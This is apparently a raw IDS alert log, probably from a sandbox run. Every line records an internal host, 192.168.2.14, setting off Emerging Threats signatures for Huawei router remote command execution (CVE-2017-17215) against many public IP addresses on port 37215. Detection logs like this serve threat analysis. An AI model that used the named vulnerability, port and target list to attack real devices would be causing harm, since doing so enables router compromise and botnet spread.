                                                    07/10/24-08:26:55.297607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5432637215192.168.2.1473.141.246.51
                                                    07/10/24-08:27:13.808295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362237215192.168.2.1441.151.93.131
                                                    07/10/24-08:27:08.397659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940637215192.168.2.14136.59.150.139
                                                    07/10/24-08:26:14.791057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282237215192.168.2.14197.208.39.79
                                                    07/10/24-08:26:25.492414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970237215192.168.2.14157.172.220.101
                                                    07/10/24-08:26:36.337218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985437215192.168.2.1441.160.122.187
                                                    07/10/24-08:26:57.498447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429037215192.168.2.14197.14.115.146
                                                    07/10/24-08:27:07.329948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516837215192.168.2.1441.50.6.221
                                                    07/10/24-08:27:02.710237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685837215192.168.2.14197.64.141.21
                                                    07/10/24-08:27:22.848965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563837215192.168.2.14157.178.19.206
                                                    07/10/24-08:26:28.927814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4143437215192.168.2.1441.44.165.225
                                                    07/10/24-08:26:42.398868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449237215192.168.2.14197.51.96.87
                                                    07/10/24-08:26:34.211493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342437215192.168.2.1441.57.231.65
                                                    07/10/24-08:27:17.011385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860437215192.168.2.14157.157.179.151
                                                    07/10/24-08:26:45.655197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4592437215192.168.2.14157.17.200.30
                                                    07/10/24-08:27:08.448133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652437215192.168.2.14112.185.36.117
                                                    07/10/24-08:27:19.286417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260637215192.168.2.14197.170.242.166
                                                    07/10/24-08:26:20.187450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339037215192.168.2.1441.39.160.65
                                                    07/10/24-08:26:23.322732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311637215192.168.2.1441.112.19.247
                                                    07/10/24-08:26:43.820338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837037215192.168.2.14197.190.236.249
                                                    07/10/24-08:26:41.578740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583037215192.168.2.1441.81.60.152
                                                    07/10/24-08:26:42.370410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018637215192.168.2.1441.8.77.60
                                                    07/10/24-08:27:33.915433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451237215192.168.2.14197.194.14.157
                                                    07/10/24-08:27:19.303289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3352237215192.168.2.1441.199.227.15
                                                    07/10/24-08:26:20.126065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572837215192.168.2.14157.26.44.48
                                                    07/10/24-08:26:57.682664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405037215192.168.2.14157.76.67.165
                                                    07/10/24-08:27:02.767297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849437215192.168.2.1441.177.14.45
                                                    07/10/24-08:27:20.488674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484637215192.168.2.14157.219.18.50
                                                    07/10/24-08:27:32.563593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185837215192.168.2.14157.102.26.37
                                                    07/10/24-08:27:17.077286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411237215192.168.2.14157.67.170.209
                                                    07/10/24-08:26:22.211472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589837215192.168.2.1461.228.105.1
                                                    07/10/24-08:27:14.885642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4907037215192.168.2.14102.40.149.176
                                                    07/10/24-08:26:53.196604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527437215192.168.2.14157.177.173.220
                                                    07/10/24-08:27:14.859922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451037215192.168.2.1441.106.18.7
                                                    07/10/24-08:26:25.514103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668037215192.168.2.14151.95.132.105
                                                    07/10/24-08:26:57.602655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553437215192.168.2.14176.59.154.120
                                                    07/10/24-08:27:22.901357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526237215192.168.2.14197.23.226.206
                                                    07/10/24-08:27:08.369932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677037215192.168.2.1467.20.189.123
                                                    07/10/24-08:27:20.417090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328837215192.168.2.14197.197.199.214
                                                    07/10/24-08:26:15.858542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616237215192.168.2.1496.94.61.237
                                                    07/10/24-08:26:29.832296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287237215192.168.2.1441.218.14.205
                                                    07/10/24-08:26:28.911510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641237215192.168.2.14197.71.41.225
                                                    07/10/24-08:27:22.926905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449637215192.168.2.14197.211.227.169
                                                    07/10/24-08:26:41.568128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024237215192.168.2.14121.193.128.138
                                                    07/10/24-08:26:15.823629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5340237215192.168.2.1441.65.143.86
                                                    07/10/24-08:26:13.833831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587237215192.168.2.14197.159.168.10
                                                    07/10/24-08:26:57.666585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031237215192.168.2.14157.250.148.177
                                                    07/10/24-08:26:59.642670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576837215192.168.2.14157.188.4.120
                                                    07/10/24-08:27:05.126538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100837215192.168.2.14157.120.254.91
                                                    07/10/24-08:27:05.207255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490837215192.168.2.1441.3.170.67
                                                    07/10/24-08:27:13.876445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074637215192.168.2.14157.123.36.150
                                                    07/10/24-08:26:47.974882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170437215192.168.2.14157.196.167.18
                                                    07/10/24-08:27:27.057215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4606637215192.168.2.14197.62.244.214
                                                    07/10/24-08:26:29.832636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059637215192.168.2.14197.131.229.113
                                                    07/10/24-08:26:36.339943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4058437215192.168.2.1441.227.31.28
                                                    07/10/24-08:27:11.479148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5710437215192.168.2.1441.126.71.48
                                                    07/10/24-08:26:14.759956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356037215192.168.2.1441.168.111.237
                                                    07/10/24-08:26:29.808403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189637215192.168.2.14197.102.151.126
                                                    07/10/24-08:27:24.989466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449437215192.168.2.14157.247.194.15
                                                    07/10/24-08:26:49.920936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469037215192.168.2.1441.253.213.88
                                                    07/10/24-08:27:08.373909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118037215192.168.2.14197.123.49.58
                                                    07/10/24-08:26:36.392999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445037215192.168.2.14197.103.177.179
                                                    07/10/24-08:26:57.515772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738437215192.168.2.14157.137.68.15
                                                    07/10/24-08:26:49.755286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719037215192.168.2.1441.104.201.24
                                                    07/10/24-08:27:11.522435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192637215192.168.2.14157.1.214.151
                                                    07/10/24-08:26:15.834520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740037215192.168.2.14197.187.183.116
                                                    07/10/24-08:26:49.876942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356237215192.168.2.14157.5.232.214
                                                    07/10/24-08:27:05.207255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914637215192.168.2.14157.143.45.136
                                                    07/10/24-08:26:22.264063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958837215192.168.2.1441.213.15.169
                                                    07/10/24-08:26:26.562262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787037215192.168.2.14157.203.5.135
                                                    07/10/24-08:27:08.383825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687237215192.168.2.14197.105.238.106
                                                    07/10/24-08:27:13.714524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889237215192.168.2.1441.109.65.208
                                                    07/10/24-08:27:13.808295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196637215192.168.2.1441.142.130.116
                                                    07/10/24-08:26:13.798574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4171637215192.168.2.1451.98.106.225
                                                    07/10/24-08:27:31.559678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3635237215192.168.2.14157.151.175.175
                                                    07/10/24-08:26:22.298145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097637215192.168.2.14197.193.104.134
                                                    07/10/24-08:26:29.841830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552837215192.168.2.1441.147.227.4
                                                    07/10/24-08:27:11.547774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013637215192.168.2.14197.207.158.91
                                                    07/10/24-08:27:30.522972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772837215192.168.2.14197.189.195.251
                                                    07/10/24-08:26:17.985720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5884037215192.168.2.1435.127.224.19
                                                    07/10/24-08:26:33.201608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364037215192.168.2.14164.235.61.82
                                                    07/10/24-08:27:07.291242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082637215192.168.2.1441.32.153.66
                                                    07/10/24-08:27:22.802348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979037215192.168.2.14197.144.137.179
                                                    07/10/24-08:27:08.398717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309037215192.168.2.1441.101.164.75
                                                    07/10/24-08:26:28.775037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979037215192.168.2.1464.202.35.168
                                                    07/10/24-08:27:13.761969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470637215192.168.2.14197.127.95.10
                                                    07/10/24-08:27:27.143862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961237215192.168.2.14157.147.40.75
                                                    07/10/24-08:26:38.605361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030637215192.168.2.1441.219.17.81
                                                    07/10/24-08:27:02.999181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5881037215192.168.2.1441.39.132.14
                                                    07/10/24-08:26:36.373847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412437215192.168.2.14204.134.202.240
                                                    07/10/24-08:26:26.605487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166837215192.168.2.14157.10.169.181
                                                    07/10/24-08:27:17.098663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030037215192.168.2.14157.149.175.4
                                                    07/10/24-08:26:15.828083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380837215192.168.2.14197.44.89.111
                                                    07/10/24-08:26:38.566781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793837215192.168.2.14197.253.98.121
                                                    07/10/24-08:26:25.488012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317037215192.168.2.14157.159.109.75
                                                    07/10/24-08:26:41.521223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465637215192.168.2.1443.27.1.254
                                                    07/10/24-08:26:26.556847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273437215192.168.2.1441.91.126.224
                                                    07/10/24-08:26:52.095655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365437215192.168.2.14164.19.249.253
                                                    07/10/24-08:26:14.786182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287437215192.168.2.1441.93.117.255
                                                    07/10/24-08:26:28.842346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401437215192.168.2.14157.43.165.200
                                                    07/10/24-08:27:14.847591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369037215192.168.2.14188.40.64.178
                                                    07/10/24-08:26:17.997408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374237215192.168.2.1441.184.126.45
                                                    07/10/24-08:26:45.639847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612237215192.168.2.14157.3.252.8
                                                    07/10/24-08:27:13.803034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929237215192.168.2.14197.67.72.113
                                                    07/10/24-08:27:30.486593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021437215192.168.2.1441.83.144.5
                                                    07/10/24-08:27:05.205461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083237215192.168.2.14135.61.246.233
                                                    07/10/24-08:26:43.538160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658637215192.168.2.14157.198.164.172
                                                    07/10/24-08:26:11.524007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658837215192.168.2.1473.111.130.134
                                                    07/10/24-08:26:34.188180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901237215192.168.2.1441.12.158.234
                                                    07/10/24-08:26:34.217432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575837215192.168.2.1441.77.193.131
                                                    07/10/24-08:27:20.425119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332437215192.168.2.1441.98.212.117
                                                    07/10/24-08:26:34.251160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862637215192.168.2.1441.52.79.81
                                                    07/10/24-08:27:31.548799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842037215192.168.2.14157.28.244.185
                                                    07/10/24-08:27:05.233513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314037215192.168.2.14157.88.131.218
                                                    07/10/24-08:26:55.372115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077037215192.168.2.14157.77.237.224
                                                    07/10/24-08:27:02.906092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4456837215192.168.2.14218.193.145.233
                                                    07/10/24-08:27:14.672861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018237215192.168.2.14197.148.24.182
                                                    07/10/24-08:26:14.787511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710837215192.168.2.14197.129.50.6
                                                    07/10/24-08:26:59.611228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767437215192.168.2.14157.235.30.213
                                                    07/10/24-08:27:13.974355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783237215192.168.2.14136.170.173.7
                                                    07/10/24-08:26:38.548975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436637215192.168.2.14197.48.195.8
                                                    07/10/24-08:26:29.888155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427637215192.168.2.14157.219.59.64
                                                    07/10/24-08:27:20.465194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5830237215192.168.2.14194.35.124.161
                                                    07/10/24-08:27:23.948745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498237215192.168.2.148.48.222.163
                                                    07/10/24-08:26:18.011299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6088837215192.168.2.14157.140.88.71
                                                    07/10/24-08:26:25.446439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681237215192.168.2.14178.71.160.165
                                                    07/10/24-08:26:38.620224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903037215192.168.2.1441.96.21.91
                                                    07/10/24-08:27:28.062110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663037215192.168.2.14157.160.74.159
                                                    07/10/24-08:26:26.437394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442637215192.168.2.14197.186.115.56
                                                    07/10/24-08:26:42.437596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153437215192.168.2.14152.216.46.171
                                                    07/10/24-08:26:59.847925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158637215192.168.2.1446.204.217.22
                                                    07/10/24-08:26:49.805971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662037215192.168.2.14157.250.111.183
                                                    07/10/24-08:27:19.151496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6059437215192.168.2.14143.139.149.100
                                                    07/10/24-08:27:08.371884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096237215192.168.2.14157.34.114.148
                                                    07/10/24-08:26:14.816754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816237215192.168.2.1441.16.250.241
                                                    07/10/24-08:26:38.518951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285037215192.168.2.14154.126.174.229
                                                    07/10/24-08:27:33.961510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858037215192.168.2.14161.217.51.2
                                                    07/10/24-08:26:28.929759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343837215192.168.2.14197.5.52.119
                                                    07/10/24-08:26:59.751989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124037215192.168.2.14205.0.140.74
                                                    07/10/24-08:26:43.922168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775237215192.168.2.14197.14.94.82
                                                    07/10/24-08:27:20.460013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682837215192.168.2.1441.250.145.191
                                                    07/10/24-08:26:47.985761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299637215192.168.2.1465.73.230.203
                                                    07/10/24-08:26:41.571584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492237215192.168.2.1424.101.209.2
                                                    07/10/24-08:26:57.682108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291837215192.168.2.14129.97.225.185
                                                    07/10/24-08:27:32.507738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258437215192.168.2.1452.172.113.204
                                                    07/10/24-08:27:33.673739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754237215192.168.2.1441.81.160.206
                                                    07/10/24-08:26:49.900160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973637215192.168.2.14157.140.116.189
                                                    07/10/24-08:26:59.875965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947837215192.168.2.1441.31.50.133
                                                    07/10/24-08:27:19.334361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892637215192.168.2.14157.89.127.234
                                                    07/10/24-08:26:43.665744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575037215192.168.2.1436.245.171.34
                                                    07/10/24-08:26:13.646644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018637215192.168.2.1441.73.243.177
                                                    07/10/24-08:27:02.800250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604637215192.168.2.1441.230.43.119
                                                    07/10/24-08:27:22.912600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517837215192.168.2.14197.138.199.178
                                                    07/10/24-08:26:28.887651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238237215192.168.2.1441.207.202.43
                                                    07/10/24-08:26:33.204295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695037215192.168.2.1441.245.146.71
                                                    07/10/24-08:26:41.350291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306237215192.168.2.14157.88.224.188
                                                    07/10/24-08:26:23.345555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863037215192.168.2.14157.119.195.164
                                                    07/10/24-08:27:02.991473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394837215192.168.2.14197.155.103.115
                                                    07/10/24-08:27:13.808295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837637215192.168.2.14126.201.22.228
                                                    07/10/24-08:27:02.918054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586437215192.168.2.142.197.29.32
                                                    07/10/24-08:26:47.824141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568237215192.168.2.14173.201.190.239
                                                    07/10/24-08:27:08.415369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683837215192.168.2.1497.21.24.90
                                                    07/10/24-08:26:28.728876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599837215192.168.2.14197.231.230.142
                                                    07/10/24-08:26:43.611517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705437215192.168.2.14191.129.158.22
                                                    07/10/24-08:26:43.856706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177037215192.168.2.14157.60.94.208
                                                    07/10/24-08:27:14.903189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476837215192.168.2.1441.106.100.17
                                                    07/10/24-08:26:38.631405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965437215192.168.2.14157.243.122.232
                                                    07/10/24-08:27:24.949781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165637215192.168.2.14197.22.117.194
                                                    07/10/24-08:27:02.860039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556837215192.168.2.1441.130.119.87
                                                    07/10/24-08:27:05.131272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729237215192.168.2.14157.141.19.162
                                                    07/10/24-08:26:55.456990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734437215192.168.2.14197.114.26.16
                                                    07/10/24-08:27:10.599679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022037215192.168.2.14132.237.246.177
                                                    07/10/24-08:26:48.013937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834437215192.168.2.1441.132.196.196
                                                    07/10/24-08:26:26.437789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541237215192.168.2.14116.117.166.55
                                                    07/10/24-08:26:34.201699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008037215192.168.2.14182.225.142.153
                                                    07/10/24-08:26:43.714362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505037215192.168.2.14197.114.19.215
                                                    07/10/24-08:26:18.017676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677837215192.168.2.1444.86.7.156
                                                    07/10/24-08:26:36.381713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003837215192.168.2.14182.43.172.17
                                                    07/10/24-08:26:36.436089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812037215192.168.2.14197.242.136.162
                                                    07/10/24-08:26:20.134395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961037215192.168.2.1437.128.251.215
                                                    07/10/24-08:27:33.947642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063037215192.168.2.1441.13.117.1
                                                    07/10/24-08:26:48.016890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5350037215192.168.2.14197.243.104.223
                                                    07/10/24-08:26:57.633994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053637215192.168.2.14197.60.236.169
                                                    07/10/24-08:26:59.816598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733837215192.168.2.141.159.148.192
                                                    07/10/24-08:26:11.491653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515437215192.168.2.14111.12.69.255
                                                    07/10/24-08:26:59.572693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802437215192.168.2.14157.174.11.107
